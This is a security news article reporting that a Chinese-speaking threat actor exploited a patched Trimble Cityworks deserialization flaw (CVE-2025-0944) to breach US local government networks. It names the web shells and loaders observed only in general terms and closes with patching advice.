Chinese Hackers Exploit Trimble Cityworks Flaw to Infiltrate U.S. Government Networks

A Chinese-speaking threat actor known as UAT-6382 has been linked to active exploitation of a high-severity remote code execution vulnerability in Trimble Cityworks, a widely used GIS-centric asset management system. The campaign appears to have begun in early 2025 and primarily targets local government networks in the United States.

The vulnerability, tracked as CVE-2025-0944 (CVSS score: 8.6), involved unsafe deserialization of untrusted data and has since been patched. When exploited, it allowed attackers to execute arbitrary code remotely. This flaw was later included in the U.S. government's catalog of known exploited vulnerabilities.

Exploitation Workflow and Payloads

After gaining initial access via the Cityworks flaw, the attackers moved quickly to conduct internal reconnaissance. They deployed a series of web shells and custom malware to establish long-term access and further their objectives. Tools observed in this campaign included:

Cobalt Strike, a well-known post-exploitation tool
VShell, a Go-based remote access tool
Web shells such as AntSword, Chopper, and Behinder, often used by Chinese-linked threat groups

The attackers also employed a Rust-based loader, dubbed TetraLoader, designed to deliver payloads like Cobalt Strike. This loader was reportedly built using MaLoader, an open-source malware-building framework.

Objectives and Tactics

Once inside the networks, UAT-6382 appeared particularly interested in utility management systems. The group reportedly enumerated directories to locate sensitive or valuable files and used previously deployed web shells to exfiltrate the data.

PowerShell was used extensively to deploy additional backdoors, supporting long-term persistence and further exploitation of compromised systems.

Summary

This campaign underscores the growing sophistication of threat actors leveraging newly disclosed vulnerabilities in industry-specific software. It also highlights the importance of timely patching and proactive monitoring for anomalous activity, particularly in public sector and infrastructure-related networks.

Organizations using Cityworks or similar platforms are strongly encouraged to ensure that all security updates have been applied and to audit their environments for any signs of compromise.